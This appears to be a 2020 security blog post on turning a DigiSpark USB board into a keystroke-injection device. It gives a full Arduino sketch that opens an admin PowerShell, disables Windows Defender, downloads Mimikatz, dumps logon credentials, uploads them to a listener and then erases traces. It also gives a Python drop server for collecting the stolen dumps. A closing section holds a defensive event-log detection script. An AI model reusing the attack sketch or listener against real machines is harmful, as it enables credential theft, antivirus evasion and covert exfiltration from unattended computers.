February 7, 2020

Weaponizing DigiSpark with Mimikatz

What’s DigiSpark ?

DigiSpark is one of the smallest Arduino-compatible development boards, built around an ATtiny85 microcontroller. It runs off the USB port's 5 V, leaves roughly 6 KB of the ATtiny85's 8 KB flash for your sketch (the Micronucleus USB bootloader takes the rest) and exposes six I/O pins. Its real charm is that it is cheap and easy to get, yet capable enough to run a weaponized keystroke-injection sketch.

The great plan

Program the DigiSpark to steal credentials from a Windows system as fast and as stealthily as possible. It is meant as a quick way to pull credentials from an unattended, unlocked machine: the board presents itself as a HID (Human Interface Device, i.e. a keyboard) and simply types the attack in. That also fixes the preconditions: the logged-in user must be a local administrator (the elevated PowerShell goes through a UAC consent prompt, not a credential prompt), the host must use a US keyboard layout, and Defender Tamper Protection must be off, otherwise the Set-MpPreference step is rejected.

The process is as follows:

  1. Open a PowerShell session as Administrator
  2. Relax the PowerShell script execution policy
  3. Disable Windows Defender real-time scanning
  4. Download and run Mimikatz to dump credentials
  5. Read the dump back as a single string
  6. POST that string to a PHP listener
  7. Revert the Defender and execution-policy changes
  8. Clear leftover history and files
  9. Light the LED to signal that it is done

Setting up software

Since the DigiSpark is a microcontroller board, it has to be programmed from an IDE with the proper board support (and, on Windows, the Digistump USB drivers) installed.

In this scenario we will be using the Arduino IDE, which is available for download from the Arduino website.

After setting it up, the Digistump board package is required for DigiSpark support:

  • Head to File – Preferences
  • In the box named “Additional Boards Manager URLs” add the following:
http://digistump.com/package_digistump_index.json
  • Click OK
  • Head to the Tools menu
  • Click Boards Manager, located in the Board submenu
  • Search for Digistump and install “Digistump AVR Boards”

Now you're all set!

Select Digispark (Default - 16.5mhz) under Tools – Board and click Upload with the board unplugged: the DigiSpark has no USB serial port, so the IDE waits (60 seconds) for you to plug it in and flashes the sketch through the Micronucleus bootloader as soon as the board enumerates. One thing to check before relying on the sketch: DigiKeyboard sends scancodes for a US keyboard layout, so characters such as $, : and \ come out wrong on a host configured with a different layout.


Script

#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); // on-board LED is pin 1 on model A (pin 0 on model B)
}

void loop() {
  DigiKeyboard.delay(6000); // wait 6 sec so the host finishes enumerating the keyboard
  DigiKeyboard.sendKeyStroke(0); // empty report; avoids losing the first keystroke on some hosts
  DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X opens the quick-link menu
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_A); // "A" = Windows PowerShell (Admin)
  DigiKeyboard.delay(2000); // give laggy PCs time to show the UAC prompt
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // UAC focuses "No" by default; Left moves to "Yes"
  DigiKeyboard.sendKeyStroke(KEY_ENTER); // confirm the prompt
  DigiKeyboard.delay(1000);
  // -Force suppresses the Y/N confirmation that would otherwise swallow every line typed after it
  DigiKeyboard.println("Set-ExecutionPolicy Unrestricted -Force"); // Relax the script execution policy
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true"); // Disable Defender real-time scanning
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("cd $ENV:temp"); // Navigate into the temp dir
  DigiKeyboard.delay(1000);
  // URL removed by the author ("Can'tHostAnymore"); supply your own host for the binary
  DigiKeyboard.println("Invoke-WebRequest -Uri '<mimikatz-url>' -OutFile 'mimi.exe'");
  DigiKeyboard.delay(1000);
  // privilege::debug is required for sekurlsa; the trailing 'exit' keeps mimikatz from
  // dropping into its interactive prompt and hanging the rest of the script
  DigiKeyboard.println("./mimi.exe 'privilege::debug' 'sekurlsa::logonpasswords full' 'exit' > dump.file"); // Dump credentials
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("$output = Get-Content dump.file -Raw"); // -Raw yields one string instead of an array of lines
  DigiKeyboard.delay(1000);
  // Listener URL removed by the author ("PHPI'mNotHosting"); point this at your own listener
  DigiKeyboard.println("(New-Object Net.WebClient).UploadString('<listener-url>', $output)"); // Upload to listener
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Remove-Item mimi.exe, dump.file"); // Remove mimikatz and the plaintext dump
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-ExecutionPolicy Restricted -Force"); // Revert policy (Restricted is the Windows 10 client default)
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false"); // Re-enable Defender real-time scanning
  DigiKeyboard.delay(1000);
  // Backslashes must be doubled inside a C string, or the compiler drops them and the path is typed wrong
  DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue"); // Remove Run prompt history
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("exit"); // Exit PowerShell
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(1, HIGH); // LED on: safe to unplug
  for (;;) {
    DigiKeyboard.delay(1000); // idle forever; otherwise loop() restarts and retypes the whole attack
  }
}

I think the code is pretty straightforward and the comments are simple; the listener script is available in the repository. (Update: the repo has been removed, message me for the code.)
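Step 6 of the chain POSTs the dump with WebClient.UploadString, and the author's PHP listener is no longer available. What follows is an added stand-in written for this page (my code, not the author's and not from the removed repository), in Python rather than PHP: a minimal HTTP drop box that accepts the POST, writes the body to its own timestamped file under a loot/ directory and answers 200, rejecting empty and oversized bodies. Port 8080, the loot/ directory and the lack of auth or TLS are assumptions; the self-check client and the mimikatz-style sample line are constructed.

```python
"""Added example: a minimal HTTP drop box for the UploadString step.

Stand-in for the author's (no longer available) PHP listener, written in Python.
Assumptions: port 8080, loot/ as the output directory, no auth, no TLS.
"""
import http.server
import socketserver
import tempfile
import threading
import urllib.error
import urllib.request
from datetime import datetime, timezone
from pathlib import Path

DROP_DIR = Path("loot")          # assumed output directory
MAX_BODY = 4 * 1024 * 1024       # a logonpasswords dump is a few KB; refuse anything huge


def store_upload(body: bytes, remote: str, drop_dir: Path) -> Path:
    """Write one received dump to its own timestamped file and return the path."""
    drop_dir.mkdir(parents=True, exist_ok=True)
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%S.%fZ")
    path = drop_dir / f"{stamp}_{remote.replace(':', '_')}.txt"
    # Stored exactly as received: UploadString encodes with WebClient.Encoding
    # (the system ANSI code page unless the client sets it to UTF-8)
    path.write_bytes(body)
    return path


class DropHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        try:
            length = int(self.headers.get("Content-Length") or 0)
        except ValueError:
            length = 0
        if length <= 0:
            self.send_error(400, "empty body")
            return
        if length > MAX_BODY:
            self.send_error(413, "too large")
            return
        store_upload(self.rfile.read(length), self.client_address[0], self.server.drop_dir)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):              # nothing to browse; do not advertise what this is
        self.send_error(404)

    def log_message(self, *args):  # keep stdout quiet
        pass


class DropServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address, drop_dir: Path):
        super().__init__(address, DropHandler)
        self.drop_dir = drop_dir


def run_server(host: str, port: int, drop_dir: Path = DROP_DIR) -> DropServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = DropServer((host, port), drop_dir)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def send_upload(url: str, text: str) -> int:
    """Client-side self-check mimicking WebClient.UploadString; returns the HTTP status."""
    req = urllib.request.Request(url, data=text.encode("utf-8"), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def received_files(drop_dir: Path) -> list:
    """Dumps stored so far, oldest first (file names start with the timestamp)."""
    return sorted(p for p in drop_dir.iterdir() if p.is_file())


def temp_drop_dir() -> Path:
    """Throwaway drop directory for local testing."""
    return Path(tempfile.mkdtemp(prefix="loot_"))


if __name__ == "__main__":
    srv = run_server("0.0.0.0", 8080)
    print(f"listening on {srv.server_address[0]}:{srv.server_address[1]}, writing to {DROP_DIR}/")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it on the listener host and point the UploadString call at http://<host>:8080/. Because UploadString encodes with WebClient.Encoding, set `$wc.Encoding = [Text.Encoding]::UTF8` on the client if non-ASCII user names matter; the listener does not guess. Anyone who can reach the port can post into loot/, so on a real engagement put it behind TLS and restrict the source range.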

This is still in early alpha, so expect a lot of changes to be made.

A Bash script for automating the server-side install is still in progress.
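Steps 7 and 8 revert the policy and Defender changes and clear the Run history, but the chain still leaves a loud trail: a new HID keyboard in the Kernel-PnP configuration log, Defender event 5001 (real-time protection disabled) and, where script block logging is on, a 4104 entry for every line the board typed; PSReadLine also keeps those lines in ConsoleHost_history.txt, which the sketch does not touch. The block below is an added detection example (mine, not from the post) that tags those artifacts per host and alerts when enough of them land inside a two-minute window. The JSON-lines format, the field names (TimeCreated, LogName, Id, Message, Computer) and the sample events are constructed to resemble a Get-WinEvent export, not real logs; the VID/PID values and IP addresses in the samples are made up.

```python
"""Added example: score the artifacts of the DigiSpark/Mimikatz chain per host.

Input is JSON lines resembling a Get-WinEvent export (constructed format; the
field names are assumptions). The PowerShell indicators need script block
logging (event 4104) to be enabled on the endpoint.
"""
import json
import re
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=120)   # the whole typed chain finishes in well under 2 minutes
MIN_INDICATORS = 3                # distinct indicators needed before we alert

# (LogName, EventId, regex over Message or None, indicator name)
RULES = [
    ("Microsoft-Windows-Kernel-PnP/Configuration", 400,
     re.compile(r"Device HID\\", re.I), "new_hid_device"),
    ("Microsoft-Windows-Windows Defender/Operational", 5001,
     None, "defender_realtime_off"),
    ("Microsoft-Windows-PowerShell/Operational", 4104,
     re.compile(r"Set-MpPreference\b.*DisableRealtimeMonitoring", re.I), "defender_disable_cmd"),
    ("Microsoft-Windows-PowerShell/Operational", 4104,
     re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.I), "execpolicy_relaxed"),
    ("Microsoft-Windows-PowerShell/Operational", 4104,
     re.compile(r"sekurlsa::|logonpasswords", re.I), "mimikatz_command"),
    ("Microsoft-Windows-PowerShell/Operational", 4104,
     re.compile(r"UploadString\(|Invoke-WebRequest\b.*-OutFile", re.I), "download_or_exfil"),
]

# Constructed sample: WS01 sees the full chain, WS02 only an admin relaxing the policy at noon
# and a keyboard plugged in hours earlier (benign).
SAMPLE_EVENTS = r"""
{"Computer": "WS01", "LogName": "Microsoft-Windows-Kernel-PnP/Configuration", "Id": 400, "TimeCreated": "2020-02-07T12:00:00", "Message": "Device HID\\VID_1234&PID_5678\\6&1a2b3c4d&0&0000 was configured."}
{"Computer": "WS01", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:00:09", "Message": "Creating Scriptblock text (1 of 1):\nSet-ExecutionPolicy Unrestricted -Force\n\nScriptBlock ID: 0001"}
{"Computer": "WS01", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:00:11", "Message": "Creating Scriptblock text (1 of 1):\nSet-MpPreference -DisableRealtimeMonitoring $true\n\nScriptBlock ID: 0002"}
{"Computer": "WS01", "LogName": "Microsoft-Windows-Windows Defender/Operational", "Id": 5001, "TimeCreated": "2020-02-07T12:00:11", "Message": "Real-time Protection scanning for malware and other potentially unwanted software was disabled."}
{"Computer": "WS01", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:00:13", "Message": "Creating Scriptblock text (1 of 1):\nInvoke-WebRequest -Uri 'http://10.0.0.5/mimi.exe' -OutFile 'mimi.exe'\n\nScriptBlock ID: 0003"}
{"Computer": "WS01", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:00:15", "Message": "Creating Scriptblock text (1 of 1):\n./mimi.exe 'privilege::debug' 'sekurlsa::logonpasswords full' 'exit' > dump.file\n\nScriptBlock ID: 0004"}
{"Computer": "WS01", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:00:18", "Message": "Creating Scriptblock text (1 of 1):\n(New-Object Net.WebClient).UploadString('http://10.0.0.5/drop', $output)\n\nScriptBlock ID: 0005"}
{"Computer": "WS02", "LogName": "Microsoft-Windows-Kernel-PnP/Configuration", "Id": 400, "TimeCreated": "2020-02-07T09:02:30", "Message": "Device HID\\VID_ABCD&PID_0001\\7&2b3c4d5e&0&0000 was configured."}
{"Computer": "WS02", "LogName": "Microsoft-Windows-PowerShell/Operational", "Id": 4104, "TimeCreated": "2020-02-07T12:30:00", "Message": "Creating Scriptblock text (1 of 1):\nSet-ExecutionPolicy Unrestricted -Force\n\nScriptBlock ID: 0006"}
"""


def parse_events(lines):
    """Parse JSON-lines records and return them sorted by TimeCreated."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["TimeCreated"] = datetime.fromisoformat(rec["TimeCreated"])
        events.append(rec)
    return sorted(events, key=lambda e: e["TimeCreated"])


def match_indicators(event):
    """Set of indicator names a single event satisfies (usually zero or one)."""
    hits = set()
    for log, eid, pattern, name in RULES:
        if event["LogName"] == log and event["Id"] == eid and \
                (pattern is None or pattern.search(event.get("Message", ""))):
            hits.add(name)
    return hits


def detect(events):
    """One alert per host whose distinct indicators reach MIN_INDICATORS inside WINDOW."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["Computer"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        tagged = [(ev["TimeCreated"], match_indicators(ev)) for ev in evs]
        tagged = [(t, hits) for t, hits in tagged if hits]
        for i, (start, _) in enumerate(tagged):       # slide the window over tagged events
            seen = set()
            for t, hits in tagged[i:]:
                if t - start > WINDOW:
                    break
                seen |= hits
            if len(seen) >= MIN_INDICATORS:
                alerts.append({"host": host, "start": start.isoformat(),
                               "indicators": sorted(seen),
                               "severity": "high" if "new_hid_device" in seen else "medium"})
                break                                  # one alert per host; pull the timeline from there
    return alerts


def load_sample():
    return parse_events(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    for alert in detect(load_sample()):
        print(alert)
```

The rules deliberately key on the side effects rather than on the board's USB identifiers, so the same logic catches an operator typing the chain by hand (medium severity) and raises it to high only when a keyboard appeared just before. Feeding it real data means exporting the three logs with Get-WinEvent and ConvertTo-Json one record per line, and adjusting the field names if your export differs.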
Thanks for reading!